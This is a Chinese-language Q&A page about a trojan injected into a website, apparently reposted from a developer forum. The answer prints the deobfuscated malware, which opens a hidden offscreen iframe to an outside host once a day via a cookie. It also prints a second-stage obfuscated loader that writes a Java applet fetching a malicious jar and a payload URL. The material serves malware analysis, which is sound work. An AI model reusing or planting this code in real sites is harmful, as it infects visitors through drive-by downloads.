XML注释标签的Javascript恶意注入/重定向(JS/Exploit-Blacole.em
我最近出现了一个网站,在其
HTML标记内部嵌入了一个JS木马. McAfee名称为JS / Exploit-Blacole.em,F-Secure名称为Trojan:JS / Agent,MS名称为Trojan:JS / Quidvetis.A.
现在,出于好奇,我看了一下木马的源代码(仅供参考,我在pastebin上发了一个副本,看这里http://pastebin.com/PsLaE4d9). 令我惊讶的是迈克菲网站(http://home.mcafee.com/virusinfo/virusprofile.aspx?key=1317346#none,点击“病毒特征”标签)上的部分说明
特洛伊木马本身似乎在标记中注入了iframe标记并加载了一些恶意页面. 无论如何,我的问题是,那些XML评论标签会扮演什么角色?肯定有必要在McAfee文章中提及它们的原因吗?此外,是否有可能以某种方式去混淆JS代码并将其转换为人类可读的东西?再一次,这只是出于好奇.我只是想知道这里发生了什么.
看看这里
http://wepawet.iseclab.org/view.php?hash=86b656e6ad9d7331acc01a80bf89c6b5&type=js http://jsunpack.jeek.org/?report=87803db7e6a4d9d0b6190cd5054beda64e3784dd http://urlquery.net/index.php 这些工具将帮助您分析代码 这是完整的检索和未经模糊处理的代码: function r09(){ var static = 'ajax'; var controller = 'index.php'; var r = document.createElement('iframe'); r.src = 'http://ecurie80.hostzi.com/Felenne12/clik.php'; r.style.position = 'absolute'; r.style.color = '6675'; r.style.height = '6675px'; r.style.width = '6675px'; r.style.left = '10006675'; r.style.top = '10006675'; if (!document.getElementById('r')){ document.write('<p id='r' class='r09' ></p>'); document.getElementById('r').appendChild(r); } } function SetCookie(cookieName,cookieValue,nDays,path){ var today = new Date(); var expire = new Date(); if (nDays == null || nDays == 0)nDays = 1; expire.setTime(today.getTime() + 3600000 * 24 * nDays); document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire. toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie(name){ var start = document.cookie.indexOf(name + "="); var len = start + name.length + 1; if ((!start) && (name != document.cookie.substring(0,name.length))){ return null; } if (start == - 1)return null; var end = document.cookie.indexOf(";",len); if (end == - 1)end = document.cookie.length; return unescape(document.cookie.substring(len,end)); } if (navigator.cookieEnabled){ if (GetCookie('visited_uq') == 55){ } else { SetCookie('visited_uq','55','1','/'); r09(); } } 此代码创建一个iframe并将其推出视图 代码只使用cookie每天运行一次 http://jsunpack.jeek.org/也是许多安全研究人员使用的很棒的工具(比如Brian Krebs?) Iframe加载Java漏洞并尝试运行它: var FPLYKJoQG = { WdBxtaXWsGnJRm: function (PseXOSDnXPAXRRnkHZs) { var FIZdpsWVSgyPuFKU = document; FIZdpsWVSgyPuFKU.write(PseXOSDnXPAXRRnkHZs); },wWgsxtVAofesbJwDAY: function (xPTKZBm) { return xPTKZBm.replace(/355/g,'') } }; var SuOmy = FPLYKJoQG.wWgsxtVAofesbJwDAY('355Ja355355355355va355355355355355355355355'); var CHHBPE = z.vvv( SuOmy ).split(','); var BZTlEHUaD = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355j355355355n355355355355355355355355355355355355355355l355p355355355355355355355355355'); var ZNZXaZkfijhQTihemz = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355355355355ap355355355355355355355355pl355355355355355355355355355355e355355355355355355t'); if (CHHBPE[1] == 7 && CHHBPE[3] > 9) { FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + ' height="10" width="10"><param name="' + BZTlEHUaD + '_href" value="d5xs6x0pt9tk85s.jnlp" /><param name="' + BZTlEHUaD + '_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbmxwIiBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdGxlPjN5ZE5NQW1PSmlLYlNxRmJZMEl0THM8L3RpdGxlPg0KICAgIDx2ZW5kb3I+VzRBcGFXZngxUWwwMXRMbmR1TWFacVpzVGxISlBBVHF4anhNTWYxRG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSIxLjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YWxseS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dGxnLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2xhc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+" /><param name="duFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>'); } else { FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + ' height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class" archive="/gossip_usually.jar" width="10"><param name="duFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>'); } 加载d5xs6x0pt9tk85s.jnlp并执行它 <applet height="10" width="10"><param name="jnlp_href" value="d5xs6x0pt9tk85ss.jnlp"><param name="jnlp_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbmxwIiBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdGxlPjN5ZE5NQW1PSmlLYlNxRmJZMEl0THM8L3RpdGxlPg0KICAgIDx2ZW5kb3I+VzRBcGFXZngxUWwwMXRMbmR1TWFacVpzVGxISlBBVHF4anhNTWYxRG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSIxLjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YWxseS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dGxnLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2xhc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+"><param name="duFJfXw" value="http://aussteigende.tommeade.coms:1024/sequence-backwards.txt?e=21"></applet> 或者如果这不可能加载gossip_usually.jar文件并加载/执行wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class: <applet height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbjs.class" archive="/gossip_usuallys.jar" width="10"><param name="duFJfXw" value="http://aussteigende.tommeades.com:1024/sequence-backwards.txt?e=21"></applet> (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |